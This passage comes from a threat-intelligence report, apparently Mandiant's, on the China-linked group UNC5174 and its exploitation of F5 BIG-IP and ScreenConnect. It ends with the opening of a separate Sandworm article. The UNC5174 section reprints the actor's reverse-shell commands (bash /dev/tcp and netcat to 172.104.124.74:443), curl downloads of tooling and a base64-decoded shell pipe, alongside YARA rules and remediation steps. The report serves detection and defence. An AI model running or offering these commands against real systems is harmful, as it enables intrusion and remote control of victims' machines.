    </div>
  




</div>
<div class="block-paragraph_advanced"><p>SNOWLIGHT is a downloader written in C and is designed to run on Linux systems. SNOWLIGHT uses raw sockets to connect to a hard-coded IP address over TCP port 443 and uses a binary protocol to communicate with the command-and-control (C2 or C&amp;C) server, though one variant has been observed using a fake HTTP header for an initial beacon packet. Upon successful communication with its C2 server, a secondary ELF file is downloaded and XOR decoded using the key "0x99".</p>
<p>Finally, the decoded secondary ELF file is loaded into memory using Linux's "sys_memfd_create" and executed via "fexecve". The payload is downloaded directly into memory and executed without ever being written to disk. In the SNOWLIGHT variants we observed, the payloads process will run under the hard-coded name of "". This is identifiable in a running process list as a "memfd" process.</p>
<p>The SNOWLIGHT sample analyzed by Mandiant was configured to download an obfuscated executable that Mandiant has dubbed GOHEAVY from infrastructure related to SUPERSHELL administrators. This payload is then executed in-memory via the previously described memfd method. The resultant GOHEAVY process-related artifacts were observed on the compromised F5 appliance:</p>
<ul>
<li>Process Name: memfd:a (deleted)</li>
<li>Path: empty (due to the executable being un-backed)</li>
<li>Args: ?</li>
<li>User: root</li>
</ul>
<p>GOREVERSE is a publicly available reverse shell backdoor written in GoLang that operates over Secure Shell (SSH). Mandiant observed UNC5174 deploy GOREVERSE, which called back to C2 infrastructure we previously observed hosting the SUPERSHELL framework. SUPERSHELL is a publicly available C2 framework published on GitHub and used extensively in related infrastructure by the administrators of SUPERSHELL. </p>
<p>Mandiant observed evidence of UNC5174 issuing commands to connect bash and netcat TCP reverse shells back to the same infrastructure hosting GOREVERSE and SUPERSHELL payloads on port 443.</p></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>Nov  2 07:16:15 localhost.localdomain notice icrd_child[18778]: 
01420002:5: AUDIT - pid=18778 user=admin folder=
/Common module=(tmos)# status=[Command OK] cmd_data=run util 
bash -c "bash -i /dev/tcp/172.104.124[.]74/443 0&gt;&amp;1 &amp;"|</code></pre>
<p><span>Table 4: UNC5174 command to download a bash web shell</span></p></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>Nov  2 07:30:37 localhost.localdomain notice icrd_child[18778]: 
01420002:5: AUDIT - pid=18778 user=admin folder=/Common 
module=(tmos)# status=[Command OK] cmd_data=run util bash 
-c "nc 172.104.124[.]74 443 -e /bin/bash &amp;"</code></pre>
<p><span>Table 5: UNC5174 command to download a netcat web shell</span></p></div>
<div class="block-paragraph_advanced"><h3>Internal Reconnaissance</h3>
<p>Shell command history artifacts on the compromised F5 appliance recorded evidence of the threat actor downloading the file "/tmp/ss" from the same infrastructure hosting GOREVERSE and SUPERSHELL payloads, as well as GitHub, using the cURL command.</p></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>curl -o /tmp/ss hxxp://172.104.124[.]74/App-amd64linux-noupx</code></pre>
<pre class="language-plain"><code>curl -o /tmp/ss hxxps://github[.]com/1n7erface/Template/releases
/download/v1.2.5/App-amd64linux-noupx</code></pre>
<p><span>Table 6: UNC5174 command downloading unidentified additional tooling suspected of internal reconnaissance functionality</span></p></div>
<div class="block-paragraph_advanced"><p>The file "/tmp/ss" was not recoverable at the time of analysis; however, the GitHub URL resource https://github.com/1n7erface/Template hosts a likely related network scanning and reconnaissance tool with Chinese-language instructions. Execution of "/tmp/ss" was recorded in shell history, and command-line arguments indicate the tool was likely used to scan internal subnet ranges from the compromised F5 appliance using the tool <a href="https://github.com/shadow1ng/fscan" rel="noopener" target="_blank">FSCAN</a>.</p></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>./ss -i &lt;Internal CIDR block&gt;</code></pre>
<p><span>Table 7: UNC5174 command to scan internal subnet ranges from compromised F5 appliances</span></p></div>
<div class="block-paragraph_advanced"><h3>GOHEAVY Tunneler: A Closer Look</h3>
<p>UNC5174 employs a Golang-based tunneler tool named GOHEAVY, obfuscated using GOBFUSCATE for added stealth. This tool leverages the Gin framework to manage traffic routing functionalities. Mandiant observed GOHEAVY engaging in simultaneous communication with an external C2 server operated by SUPERSHELL administrators while opening and listening on a vast number of local UDP ports. Interestingly, GOHEAVY continuously broadcasts the string "SpotUdp" to existing network interfaces.</p>
<p>This behavior suggests the tool's purpose lies in establishing covert communication channels and potentially facilitating lateral movement within compromised networks. The continuous "SpotUdp" broadcast might serve as a beacon for identifying other compromised machines running GOHEAVY within the same network</p>
<p>In addition to GOHEAVY, Mandiant observed the presence of various other tools common in red teaming, including:</p>
<ul>
<li>SLIVER client</li>
<li>FFUFP</li>
<li>SQLMAP</li>
<li>DIRBUSTER</li>
<li>METASPLOIT</li>
<li>AFROG penetration testing tool</li>
<li>NUCLEI vulnerability scanning templates</li>
</ul>
<h3>UNC5174 Closes the Door Behind Them</h3>
<p>Mandiant observed an unusual behavior by UNC5174 following their initial access on the compromised appliance. After backdoor accounts were configured, they attempted to self-patch the vulnerability using an F5-provided mitigation script "<a href="http://mitigation.sh/" rel="noopener" target="_blank"><u>mitigation.sh</u></a>". Mandiant assesses that this was an attempt to limit subsequent exploitation of the system by additional unrelated threat actors attempting to access the appliance. The additional commands were observed during their initial access on the compromised appliance:</p>
<ul>
<li>bash execution CVE-2023-46747 command run for account root6 from (HK) 61.239.68.73</li>
<li>28/10 14:16:23 deleted user root6</li>
<li>28/10 14:27:35: ran command cmd_data=run /util bash -c /root/mitigation.sh -u</li>
<li>4/11/2023 03:36:30 /tmp/.del</li>
</ul>
<h2>UNC5174 Targets ScreenConnect Vulnerability</h2>
<p>On Feb. 21, 2024, the actor "uteus" claimed in forum postings to have successfully exploited the vulnerability CVE-2024-1709 in ConnectWise ScreenConnect instances belonging to hundreds of organizations globally, primarily in the U.S. and Canada. </p>
<p>Mandiant obtained the output of the actor's exploit, which showed the actor added the admin user "cvetest" to ScreenConnect instances belonging to numerous organizations. Mandiant has observed other threat actors similarly adding admin accounts at multiple victim organizations.  Mandiant was also able to confirm the compromise of several ScreenConnect instances and the presence of unauthorized users added by the uteus persona tracked as UNC5174. Mandiant assesses with moderate confidence the other organizations listed by uteus were also compromised.</p></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/f5-connectwise-fig3.max-1000x1000.png" alt="Geographic distribution of UNC5174 ScreenConnect targeting">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="xi4hf">Figure 3: Geographic distribution of UNC5174 ScreenConnect targeting</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph_advanced"><h2>Attribution</h2>
<p>Mandiant has identified a new access operations group UNC5174 that uses the personas "Uteus" (alternate spelling "uetus") on underground forums, which we assess with moderate confidence operates from China. UNC5174 was linked with several hacktivist collectives including "Dawn Calvary" and "Genesis Day" prior to 2023 and has also claimed to be affiliated with the PRC MSS as an access broker and possible contractor who conducts for profit intrusions.</p>
<h3>Chinese Hacktivists, UNC302, and UNC5174 Link to MSS Contractors</h3>
<p>Mandiant assesses UNC5174 (aka Uteus) was previously a member of Chinese hacktivist collectives "Dawn Calvary" and has collaborated with "Genesis Day" / "Xiaoqiying" and "Teng Snake." This individual appears to have departed these groups in mid-2023 and has since focused on executing access operations with the intention of brokering access to compromised environments.</p>
<p>As part of our investigation, Mandiant identified key details that suggest UNC5174 may be an initial access broker acting as an MSS contractor. The actor claimed MSS affiliation in dark web forums, claiming tacit backing of an unspecified MSS-related APT actor. Additionally, the impacted organizations targeted by UNC5174, including U.S. defense and UK government entities, were targeted concurrently by distinct known MSS access brokers UNC302, which were previously <a href="https://www.justice.gov/opa/pr/two-chinese-hackers-working-ministry-state-security-charged-global-computer-intrusion" rel="noopener" target="_blank"><u>indicted</u></a> by the U.S. Department of Justice in 2020. </p>
<p>On Oct. 10, 2023, Mandiant identified event logs suggesting unconfirmed exploitation of an F5 device IP address of several government entities. This activity was associated with the UNC5174 pseudonym "Uteus", which shared this purported access to a U.S. military contractor and UK government organization in an online communication. The same IP address targeted through the previously described CVE-2023-46747 exploitation appeared in communications from this access broker, claiming successful exploitation of Confluence vulnerability CVE-2023-22515. Details of the intrusion were discovered within communications on a dark web forum. The Uteus persona indicated they had utilized a <a href="https://github.com/Chocapikk/CVE-2023-22515" rel="noopener" target="_blank"><u>public proof of concept</u></a> to perform activities on compromised systems. Notably, Uteus is believed to be distinct from the entity "Xiaoqiying," which has independently claimed to not be employed by the Chinese Government in a Telegram channel operated by the group.</p></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/f5-connectwise-fig4.max-1000x1000.png" alt="Telegram channel for Xiaoqiying claiming no employment with the Chinese government">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="xi4hf">Figure 4: Telegram channel for Xiaoqiying claiming no employment with the Chinese government</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph_advanced"><p>Based on these findings, Mandiant assesses with moderate confidence that Uteus represents an initial access broker persona for UNC5174, used to sell obtained access to compromised systems. While definitive connections cannot be established at this time, Mandiant highlights that there are similarities between UNC5174 and UNC302, which suggests they operate within an MSS initial access broker landscape. These similarities suggest possible shared exploits and operational priorities between these threat actors, although further investigation is required for definitive attribution.</p>
<h2>Outlook and Implications</h2>
<p>UNC5174 exploitation of CVE-2023-46747 as a N-day vulnerability in tandem with recent exploitation of Connectwise ScreenConnect vulnerability CVE-2024-1709 demonstrates PRC-related threat actors' systematized approach to achieving access to targets of strategic or political interest to the PRC. China-nexus actors continue to conduct vulnerability research on widely deployed edge appliances like F5 BIG-IP and ScreenConnect to enable espionage operations at scale. These operations often include rapid exploitation of recently disclosed vulnerabilities using custom or publicly available proof-of-concept exploits. UNC5174 and UNC302 operate within this model, and their operations provide insight into the initial access broker ecosystem leveraged by the MSS to target strategically interesting global organizations. Mandiant believes that UNC5174 will continue to pose a threat to organizations in the academic, NGO, and government sectors specifically in the United States, Canada, Southeast Asia, Hong Kong, and the United Kingdom.</p>
<h2>Remediation and Hardening</h2>
<p>Mandiant recommends performing the following remediation and hardening actions on impacted F5 appliances:</p>
<ul>
<li>Restrict access to the F5 TMUI from the internet.</li>
<li>Immediately apply the F5 mitigation script published in [<a href="https://my.f5.com/manage/s/article/K000137353" rel="noopener" target="_blank"><u>K000137353</u></a>] to any vulnerable F5 appliances.</li>
<li>Investigate vulnerable F5 appliances for evidence of compromise.</li>
</ul>
<p>In the event of F5 compromise:</p>
<ul>
<li>Review appliance configurations for unauthorized modifications.</li>
<li>Review file system and operating system (OS) artifacts for evidence of privileged account creation and remove any unauthorized accounts.</li>
<li>Consider revoking and re-issuing sensitive cryptographic material such as certificates and private keys that may have been accessible to a threat actor.</li>
</ul>
<p>For impacted ScreenConnect instances, Mandiant recommends that organizations with an on-premises controller <a href="https://services.google.com/fh/files/misc/connectwise-screenconnect-remediation-hardening-guide.pdf" rel="noopener" target="_blank"><u>read our latest ScreenConnect remediation and hardening guide</u></a>.</p>
<h2>Indicators of Compromise (IOCs)</h2>
<h3>Network IOCs</h3></div>
<div class="block-paragraph_advanced"><div align="left">
<div>
<div>
<div>
<div>
<div>
<div>
<div><table><colgroup><col><col><col><col></colgroup>
<tbody>
<tr>
<td>
<p><strong>IP Address</strong></p>
</td>
<td>
<p><strong>ASN</strong></p>
</td>
<td>
<p><strong>NetBlock</strong></p>
</td>
<td>
<p><strong>Location</strong></p>
</td>
</tr>
<tr>
<td>
<p><span>118.140.151[.]242 </span></p>
</td>
<td>
<p><span>9304</span></p>
</td>
<td>
<p><span>HGC Global Communications Limited</span></p>
</td>
<td>
<p><span>(HK)</span></p>
</td>
</tr>
<tr>
<td>
<p><span>61.239.68[.]73 </span></p>
</td>
<td>
<p><span>9269</span></p>
</td>
<td>
<p><span>Hong Kong Broadband Network Ltd.</span></p>
</td>
<td>
<p><span>(HK)</span></p>
</td>
</tr>
<tr>
<td>
<p><span>172.245.68[.]110</span></p>
</td>
<td>
<p><span>36352</span><a href="https://www.virustotal.com/gui/search/entity%253Aip%2520as_owner%253AAS-COLOCROSSING" rel="noopener" target="_blank"><span> </span></a></p>
</td>
<td>
<p><span>Colocrossing</span></p>
</td>
<td>
<p><span>(U.S.)</span></p>
</td>
</tr>
</tbody>
</table></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div></div>
<div class="block-paragraph_advanced"><h3>URLs</h3>
<div align="left">
<div>
<div>
<div>
<div>
<div>
<div>
<div><table><colgroup><col><col></colgroup>
<tbody>
<tr>
<td>
<p><strong>URL</strong></p>
</td>
<td>
<p><strong>Description</strong></p>
</td>
</tr>
<tr>
<td>
<p><span>http://172.245.68[.]110:8888 </span></p>
</td>
<td>
<p><span>SUPERSHELL C2</span></p>
</td>
</tr>
</tbody>
</table></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div></div>
<div class="block-paragraph_advanced"><h3>Host IOCs</h3>
<div align="left">
<div>
<div>
<div>
<div>
<div>
<div>
<div><table><colgroup><col><col><col><col></colgroup>
<tbody>
<tr>
<td>
<p><strong><span>MD5 Hash</span></strong></p>
</td>
<td>
<p><strong><span>Filename</span></strong></p>
</td>
<td>
<p><strong><span>Type</span></strong></p>
</td>
<td>
<p><strong><span>Code Family</span></strong></p>
</td>
</tr>
<tr>
<td>
<p><span>c867881c56698f938b4e8edafe76a09b</span></p>
</td>
<td>
<p><span>LG</span></p>
</td>
<td>
<p><span>ELF</span></p>
</td>
<td>
<p><span>SNOWLIGHT</span></p>
</td>
</tr>
<tr>
<td>
<p><span>df4603548b10211f0aa77d0e9a172438</span></p>
</td>
<td>
<p><span>N/A</span></p>
</td>
<td>
<p><span>ELF</span></p>
</td>
<td>
<p><span>SNOWLIGHT</span></p>
</td>
</tr>
<tr>
<td>
<p><span>0951109dd1be0d84a33d52c135ba9c97</span></p>
</td>
<td>
<p><span>N/A</span></p>
</td>
<td>
<p><span>ELF</span></p>
</td>
<td>
<p><span>SNOWLIGHT</span></p>
</td>
</tr>
<tr>
<td>
<p><span>9c3bf506dd19c08c0ed3af9c1708a770</span></p>
</td>
<td>
<p><span>memfd:a</span></p>
</td>
<td>
<p><span>ELF</span></p>
</td>
<td>
<p><span>N/A</span></p>
</td>
</tr>
<tr>
<td>
<p><span>0ba435460fb7622344eec28063274b8a</span></p>
</td>
<td>
<p><span>undefined</span></p>
</td>
<td>
<p><span>ELF</span></p>
</td>
<td>
<p><span>SNOWLIGHT</span></p>
</td>
</tr>
<tr>
<td>
<p><span>a78bf3d16349eba86719539ee8ef562d</span></p>
</td>
<td>
<p><span>N/A</span></p>
</td>
<td>
<p><span>ELF</span></p>
</td>
<td>
<p><span>SNOWLIGHT</span></p>
</td>
</tr>
</tbody>
</table></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div></div>
<div class="block-paragraph_advanced"><h3>Host Based Indicators (Commands)</h3>
<pre class="language-plain"><code>cmd_data=run util bash -c "echo 
dG1zaCAtcSAtYyAnY2QgLztzaG93IHJ1bm5pbmctY29uZmlnIHJlY3Vyc2l2ZSc= 
| base64 -d | sh"  "tmsh -q -c 'cd /;show running-config recursive'"
run util bash -c "bash -i /dev/tcp/172.104.124.74/443 0&gt;&amp;1 &amp;"</code></pre></div>
<div class="block-paragraph_advanced"><h3>Detections</h3>
<pre class="language-plain"><code>rule M_Backdoor_GOREVERSE_2
{
        meta:
                author = "Mandiant"
                description = "This rule is designed to detect events related 
to goreverse. GOREVERSE is a publicly available reverse shell"
                md5 = "5c175ea3664279d6c0c2609844de6949"
                platforms = "Windows,Linux,MacOS"
                malware_family = "GOREVERSE"
        strings:
                $cc_main_fork_amd64 = { 41 81 39 74 72 75 65 75 ?? 48 8B 
[5] 48 8B [5] 48 8B [5] 4C 8B [5] 48 8B [5] 48 8B [5-10] E8 [4] 48 8B }
                $cc_print_help_amd64 = { 48 8D 15 [4] 48 89 94 24 [4-16] 48 
8B 1D [4] 48 8D 05 [4-24] BF 03 00 00 00 48 89 FE [0-12] E8 }
                $cc_rssh = "rssh" fullword
                $cc_validate_dest_len = { 48 83 3D [4] 00 [1-24] 49 83 FC 01 
[1-24] 49 C1 E4 05 [1-64] 83 3D [4] 00 }
                $str1 = "--[foreground|fingerprint|proxy|process_name] 
-d|--destination &lt;server_address&gt;"
                $str2 = "-d or --destination Server connect back address 
(can be baked in)"
                $str3 = "--foreground Causes the client to run without 
forking to background"
                $str4 = "--fingerprint Server public key SHA256 hex 
fingerprint for auth"
                $str5 = "--proxy Location of HTTP connect proxy to use"
                $str6 = "--process_name Process name shown in 
tasklist/process list"
        condition:
                ( ((uint32(0) == 0xcafebabe) or (uint32(0) == 0xfeedface) 
or (uint32(0) == 0xfeedfacf) or (uint32(0) == 0xbebafeca) or (uint32(0) 
== 0xcefaedfe) or (uint32(0) == 0xcffaedfe)) or (uint16(0) == 0x5a4d 
and uint32(uint32(0x3C)) == 0x00004550) or (uint32(0) == 0x464c457f)) 
and (all of ($str*) or all of ($cc_*))
}
</code></pre></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>rule M_APT_Downloader_SNOWLIGHT_1 
{
        meta:
                author = "Mandiant"
                description = "This rule is designed to detect 
the SNOWLIGHT code family"
                md5 = "0951109dd1be0d84a33d52c135ba9c97"
                platforms = "Linux"
                malware_family = "SNOWLIGHT"
        strings:
                $xor99 = { 80 31 99 48 FF C1 89 CE 29 EE 39 C6 
7C F2 48 63 D2 48 89 EE 44 89 E7 }
                $memfdcreate = { BA 01 00 00 00 BE 3B 0B 40 
00 BF 3F 01 00 00 E8 8C FE FF FF }	
        condition:
                uint32(0) == 0x464c457f and all of them
}
</code></pre></div>
<div class="block-paragraph_advanced"><h2>Mandiant Security Validation Actions</h2>
<p>Organizations can validate their security controls using the following actions with <a href="https://cloud.google.com/security/products/threat-intelligence" rel="noopener" target="_blank"><u>Mandiant Security Validation</u></a>.</p></div>
<div class="block-paragraph_advanced"><div align="center">
<div>
<div>
<div>
<div>
<div>
<div>
<div><table border="1px" cellpadding="16px"><colgroup><col><col></colgroup>
<tbody>
<tr>
<td>
<p><strong>VID</strong></p>
</td>
<td>
<p><strong>Name</strong></p>
</td>
</tr>
<tr>
<td>
<p><span>A106-917</span></p>
</td>
<td>
<p><span>Application Vulnerability - F5 BIG-IP 17.1.0, CVE-2023-46747, Exploitation</span></p>
</td>
</tr>
<tr>
<td>
<p><span>A106-916</span></p>
</td>
<td>
<p><span>Application Vulnerability - F5 BIG-IP 17.1.0, CVE-2023-46747, User Authentication</span></p>
</td>
</tr>
<tr>
<td>
<p><span>A107-059</span></p>
</td>
<td>
<p><span>Application Vulnerability - CVE-2024-1708, Exploitation, Variant #1</span></p>
</td>
</tr>
<tr>
<td>
<p><span>A107-056</span></p>
</td>
<td>
<p><span>Application Vulnerability - CVE-2024-1709, Exploitation, Variant #1</span></p>
</td>
</tr>
</tbody>
</table></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div></div>
<div class="block-paragraph_advanced"><h2>MITRE ATT&amp;CK</h2>
<p>Mandiant has observed UNC5174 use the following techniques:</p></div>
<div class="block-paragraph_advanced"><div align="left">
<div>
<div>
<div>
<div>
<div>
<div>
<div><table><colgroup><col><col><col></colgroup>
<tbody>
<tr>
<td>
<p><span>Initial Access</span></p>
</td>
<td>
<p><span>T1190</span></p>
</td>
<td>
<p><span>Exploit Public-Facing Application</span></p>
</td>
</tr>
<tr>
<td>
<p><span>Defense Evasion</span></p>
</td>
<td>
<p><span>T1027</span></p>
</td>
<td>
<p><span>Obfuscated Files or Information</span></p>
</td>
</tr>
<tr>
<td> </td>
<td>
<p><span>T1070.004</span></p>
</td>
<td>
<p><span>File Deletion</span></p>
</td>
</tr>
<tr>
<td> </td>
<td>
<p><span>T1140</span></p>
</td>
<td>
<p><span>Deobfuscate/Decode Files or Information</span></p>
</td>
</tr>
<tr>
<td> </td>
<td>
<p><span>T1222.002</span></p>
</td>
<td>
<p><span>Linux and Mac File and Directory Permissions Modification</span></p>
</td>
</tr>
<tr>
<td> </td>
<td>
<p><span>T1601.001</span></p>
</td>
<td>
<p><span>Patch System Image</span></p>
</td>
</tr>
<tr>
<td>
<p><span>Discovery</span></p>
</td>
<td>
<p><span>T1016</span></p>
</td>
<td>
<p><span>System Network Configuration Discovery</span></p>
</td>
</tr>
<tr>
<td> </td>
<td>
<p><span>T1049</span></p>
</td>
<td>
<p><span>System Network Connections Discovery</span></p>
</td>
</tr>
<tr>
<td> </td>
<td>
<p><span>T1082</span></p>
</td>
<td>
<p><span>System Information Discovery</span></p>
</td>
</tr>
<tr>
<td> </td>
<td>
<p><span>T1083</span></p>
</td>
<td>
<p><span>File and Directory Discovery</span></p>
</td>
</tr>
<tr>
<td>
<p><span>Command and Control</span></p>
</td>
<td>
<p><span>T1095</span></p>
</td>
<td>
<p><span>Non-Application Layer Protocol</span></p>
</td>
</tr>
<tr>
<td> </td>
<td>
<p><span>T1105</span></p>
</td>
<td>
<p><span>Ingress Tool Transfer</span></p>
</td>
</tr>
<tr>
<td> </td>
<td>
<p><span>T1572</span></p>
</td>
<td>
<p><span>Protocol Tunneling</span></p>
</td>
</tr>
<tr>
<td> </td>
<td>
<p><span>T1573.002</span></p>
</td>
<td>
<p><span>Asymmetric Cryptography</span></p>
</td>
</tr>
<tr>
<td>
<p><span>Execution</span></p>
</td>
<td>
<p><span>T1059</span></p>
</td>
<td>
<p><span>Command and Scripting Interpreter</span></p>
</td>
</tr>
<tr>
<td> </td>
<td>
<p><span>T1059.004</span></p>
</td>
<td>
<p><span>Unix Shell</span></p>
</td>
</tr>
<tr>
<td>
<p><span>Persistence</span></p>
</td>
<td>
<p><span>T1136.001</span></p>
</td>
<td>
<p><span>Local Account</span></p>
</td>
</tr>
<tr>
<td>
<p><span>Impact</span></p>
</td>
<td>
<p><span>T1531</span></p>
</td>
<td>
<p><span>Account Access Removal</span></p>
</td>
</tr>
<tr>
<td>
<p><span>Credential Access</span></p>
</td>
<td>
<p><span>T1003.008</span></p>
</td>
<td>
<p><span>/etc/passwd and /etc/shadow</span></p>
</td>
</tr>
<tr>
<td>
<p><span>Resource Development</span></p>
</td>
<td>
<p><span>T1608.003</span></p>
</td>
<td>
<p><span>Install Digital Certificate</span></p>
</td>
</tr>
</tbody>
</table></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<p><span><br>Mandiant has observed UNC302 use the following techniques:<br><br></span></p>
<div align="left">
<div>
<div>
<div>
<div>
<div>
<div>
<div><table><colgroup><col><col><col></colgroup>
<tbody>
<tr>
<td>
<p><span>Initial Access</span></p>
</td>
<td>
<p><span>T1133</span></p>
</td>
<td>
<p><span>External Remote Services</span></p>
</td>
</tr>
<tr>
<td> </td>
<td>
<p><span>T1189</span></p>
</td>
<td>
<p><span>Drive-by Compromise</span></p>
</td>
</tr>
<tr>
<td> </td>
<td>
<p><span>T1190</span></p>
</td>
<td>
<p><span>Exploit Public-Facing Application</span></p>
</td>
</tr>
<tr>
<td>
<p><span>Collection</span></p>
</td>
<td>
<p><span>T1213</span></p>
</td>
<td>
<p><span>Data from Information Repositories</span></p>
</td>
</tr>
<tr>
<td> </td>
<td>
<p><span>T1560</span></p>
</td>
<td>
<p><span>Archive Collected Data</span></p>
</td>
</tr>
<tr>
<td> </td>
<td>
<p><span>T1560.001</span></p>
</td>
<td>
<p><span>Archive via Utility</span></p>
</td>
</tr>
<tr>
<td>
<p><span>Persistence</span></p>
</td>
<td>
<p><span>T1505.003</span></p>
</td>
<td>
<p><span>Web Shell</span></p>
</td>
</tr>
<tr>
<td>
<p><span>Defense Evasion</span></p>
</td>
<td>
<p><span>T1027</span></p>
</td>
<td>
<p><span>Obfuscated Files or Information</span></p>
</td>
</tr>
<tr>
<td> </td>
<td>
<p><span>T1036</span></p>
</td>
<td>
<p><span>Masquerading</span></p>
</td>
</tr>
<tr>
<td> </td>
<td>
<p><span>T1070.004</span></p>
</td>
<td>
<p><span>File Deletion</span></p>
</td>
</tr>
<tr>
<td> </td>
<td>
<p><span>T1112</span></p>
</td>
<td>
<p><span>Modify Registry</span></p>
</td>
</tr>
<tr>
<td> </td>
<td>
<p><span>T1134</span></p>
</td>
<td>
<p><span>Access Token Manipulation</span></p>
</td>
</tr>
<tr>
<td> </td>
<td>
<p><span>T1497</span></p>
</td>
<td>
<p><span>Virtualization/Sandbox Evasion</span></p>
</td>
</tr>
<tr>
<td>
<p><span>Impact</span></p>
</td>
<td>
<p><span>T1529</span></p>
</td>
<td>
<p><span>System Shutdown/Reboot</span></p>
</td>
</tr>
<tr>
<td>
<p><span>Execution</span></p>
</td>
<td>
<p><span>T1059.003</span></p>
</td>
<td>
<p><span>Windows Command Shell</span></p>
</td>
</tr>
<tr>
<td> </td>
<td>
<p><span>T1059.005</span></p>
</td>
<td>
<p><span>Visual Basic</span></p>
</td>
</tr>
<tr>
<td> </td>
<td>
<p><span>T1203</span></p>
</td>
<td>
<p><span>Exploitation for Client Execution</span></p>
</td>
</tr>
<tr>
<td>
<p><span>Discovery</span></p>
</td>
<td>
<p><span>T1012</span></p>
</td>
<td>
<p><span>Query Registry</span></p>
</td>
</tr>
<tr>
<td> </td>
<td>
<p><span>T1016</span></p>
</td>
<td>
<p><span>System Network Configuration Discovery</span></p>
</td>
</tr>
<tr>
<td> </td>
<td>
<p><span>T1057</span></p>
</td>
<td>
<p><span>Process Discovery</span></p>
</td>
</tr>
<tr>
<td> </td>
<td>
<p><span>T1082</span></p>
</td>
<td>
<p><span>System Information Discovery</span></p>
</td>
</tr>
<tr>
<td> </td>
<td>
<p><span>T1083</span></p>
</td>
<td>
<p><span>File and Directory Discovery</span></p>
</td>
</tr>
<tr>
<td> </td>
<td>
<p><span>T1518</span></p>
</td>
<td>
<p><span>Software Discovery</span></p>
</td>
</tr>
<tr>
<td>
<p><span>Credential Access</span></p>
</td>
<td>
<p><span>T1003</span></p>
</td>
<td>
<p><span>OS Credential Dumping</span></p>
</td>
</tr>
<tr>
<td>
<p><span>Lateral Movement</span></p>
</td>
<td>
<p><span>T1021.001</span></p>
</td>
<td>
<p><span>Remote Desktop Protocol</span></p>
</td>
</tr>
<tr>
<td>
<p><span>Resource Development</span></p>
</td>
<td>
<p><span>T1583.003</span></p>
</td>
<td>
<p><span>Virtual Private Server</span></p>
</td>
</tr>
<tr>
<td> </td>
<td>
<p><span>T1584</span></p>
</td>
<td>
<p><span>Compromise Infrastructure</span></p>
</td>
</tr>
<tr>
<td>
<p><span>Command and Control</span></p>
</td>
<td>
<p><span>T1071.001</span></p>
</td>
<td>
<p><span>Web Protocols</span></p>
</td>
</tr>
<tr>
<td> </td>
<td>
<p><span>T1071.004</span></p>
</td>
<td>
<p><span>DNS</span></p>
</td>
</tr>
<tr>
<td> </td>
<td>
<p><span>T1095</span></p>
</td>
<td>
<p><span>Non-Application Layer Protocol</span></p>
</td>
</tr>
</tbody>
</table></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Unearthing APT44: Russia’s Notorious Cyber Sabotage Unit Sandworm]]></title>
<description><![CDATA[Written by: Gabby Roncone, Dan Black, John Wolfram, Tyler McLellan, Nick Simonian, Ryan Hall, Anton Prokopenkov, Luke Jenkins, Dan Perez, Lexie Aytes, Alden Wahlstrom

 
With Russia's full-scale invasion in its third year, Sandworm (aka FROZENBARENTS) remains a formidable threat to Ukraine. The g...]]></description>
<link>https://tsecurity.de/de/3578867/it-security-nachrichten/unearthing-apt44-russias-notorious-cyber-sabotage-unit-sandworm/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3578867/it-security-nachrichten/unearthing-apt44-russias-notorious-cyber-sabotage-unit-sandworm/</guid>
<pubDate>Sun, 07 Jun 2026 08:22:16 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div class="block-paragraph_advanced"><p>Written by:<em> </em><span>Gabby Roncone, Dan Black, John Wolfram, Tyler McLellan, Nick Simonian, Ryan Hall, Anton Prokopenkov, Luke Jenkins, Dan Perez, Lexie Aytes, Alden Wahlstrom</span></p>
<hr>
<p> </p></div>
<div class="block-paragraph_advanced"><p><span>With Russia's full-scale invasion in its third year, Sandworm (aka FROZENBARENTS) remains a formidable threat to Ukraine. The group’s operations in support of Moscow’s war aims have proven tactically and operationally adaptable, and as of today, appear to be better integrated with the activities of Russia’s conventional forces than in any other previous phase of the conflict. To date, no other Russian government-backed cyber group has played a more central role in shaping and supporting Russia’s military campaign. </span></p>
<p><span>Yet the threat posed by Sandworm is far from limited to Ukraine. Mandiant continues to see operations from the group that are global in scope in key political, military, and economic hotspots for Russia. Additionally, with a record number of people participating in national elections in 2024, Sandworm’s history of attempting to interfere in democratic processes further elevates the severity of the threat the group may pose in the near-term. </span></p>
<p><span>Given the active and diffuse nature of the threat posed by Sandworm globally, Mandiant has decided to graduate the group into a named Advanced Persistent Threat: </span><strong>APT44</strong><span>. As part of this process, we are releasing a report, “</span><a href="https://services.google.com/fh/files/misc/apt44-unearthing-sandworm.pdf" rel="noopener" target="_blank"><span>APT44: Unearthing Sandworm</span></a><span>”, that provides additional insights into the group’s new operations, retrospective insights, and context on how the group is adjusting to support Moscow’s war aims.</span></p>
<h2><span>Key Findings </span></h2>
